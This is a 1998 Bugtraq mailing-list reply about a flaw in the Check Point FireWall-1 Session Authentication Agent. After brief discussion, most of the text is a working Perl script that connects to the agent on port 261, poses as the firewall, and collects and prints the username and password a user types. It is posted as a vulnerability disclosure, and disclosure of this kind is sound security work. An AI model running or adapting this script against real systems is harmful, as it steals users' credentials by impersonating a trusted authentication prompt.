[8031] in bugtraq
Re: Firewall-1 3.0b Session Agent
daemon@ATHENA.MIT.EDU (Andrew Danforth)
Fri Sep 25 21:12:10 1998
Date: Fri, 25 Sep 1998 18:24:58 -0400
Reply-To: Andrew Danforth <acd@WEIRDNESS.NET>
From: Andrew Danforth <acd@WEIRDNESS.NET>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <Pine.LNX.3.96.980925123809.24629A-100000@mail.commwerks.com>
On Fri, 25 Sep 1998, Brooke Paul wrote:
> > -----Original Message-----
> > From: Larry Pingree [SMTP:larryp@secure-it.net]
> >
> > A problem exists in the Firewall-1 3.0b Session Agent
> >
> > All communications from the Firewall-1 Module to the session agent are
> > non-encrypted. Thus also allowing these communication to be snooped for
> > usernames and passwords.
>
> I think it's worth noting that Checkpoint states that the included
> Session Agent is a 'demo' and not officially supported. The real problem
> is the protocol they have defined. Even if you attempt to write a secure
> version it wouldn't interoperate with the firewall.
Where is that stated? I was unable to find any documentation stating that
the Authentication Agent is a demo. I'd be surprised if they advertised
Session Auth as a feature yet claimed that their Agent wasn't supported...
Here's the script that Larry referred to. I whipped it up during his FW-1
class, of all places... :)
---------- SNIP ----------
#!/usr/bin/perl -w
#
# This script connects to a FireWall-1 Session Authentication Agent
# running on Windows 95/NT. It attempts to "authenticate" the remote
# user and returns the resulting username/password.
#
# The agent supports configuration of up to three IP addresses which
# are allowed to submit authentication requests. If there are three
# addresses configured, the user is presented with the following when
# an unknown host connects:
#
# "Authentication request from this IP Address is not allowed."
# [ OK ]
#
# If there are only one or two addresses allowed, the user gets this
# nice little dialog box:
#
# "Do you want to enter this IP to the Firewall-1 list"
# [ YES ] (default) [ NO ]
#
# Guess which button your typical user will click on?
#
# If the agent closes the connection prematurely, you will get strange
# results.
#
# tested vs. FW-1 Authentication Agent 1.1
#
# Andrew Danforth <acd@weirdness.net>
require 5.000;
use Socket;
use Getopt::Std;
$| = 1;
$FIREWALL_NAME = "Corporate Firewall";
$PASSWORD_PROMPT = "FireWall-1 password";
$PORT = 261;
die unless getopts('n:p:');
unless ($TARGET_IP = shift) {
print "usage: $0 [-n firewall_name] [-p password_prompt] target_ip\n";
exit(1);
}
$FIREWALL_NAME = $opt_n if (defined $opt_n);
$PASSWORD_PROMPT = $opt_p if (defined $opt_p);
socket(SOCK, AF_INET, SOCK_STREAM, getprotobyname('tcp')) || die "socket: $!";
connect(SOCK, sockaddr_in($PORT, inet_aton($TARGET_IP))) || die "connect: $!";
select(SOCK); $| = 1; select(STDOUT);
print SOCK "220 FW-1 Session Authentication Request from $FIREWALL_NAME\n\r";
print "sent greeting\n";
print SOCK "331 User:\n\r";
print "sent user request\n";
$username = &get_response;
print "username entered: $username\n";
print SOCK "331 *$PASSWORD_PROMPT:\n\r";
$password = &get_response;
print "password entered: $password\n";
print SOCK "200 User $username authenticated by FireWall-1 authentication.\n\r";
print SOCK "230 OK\n\r";
sub get_response {
# this is ugly but it works. the session agent doesn't seem to send proper newlines.
my $input;
$input .= $key while($key = getc SOCK and ord($key));
return $input;
}
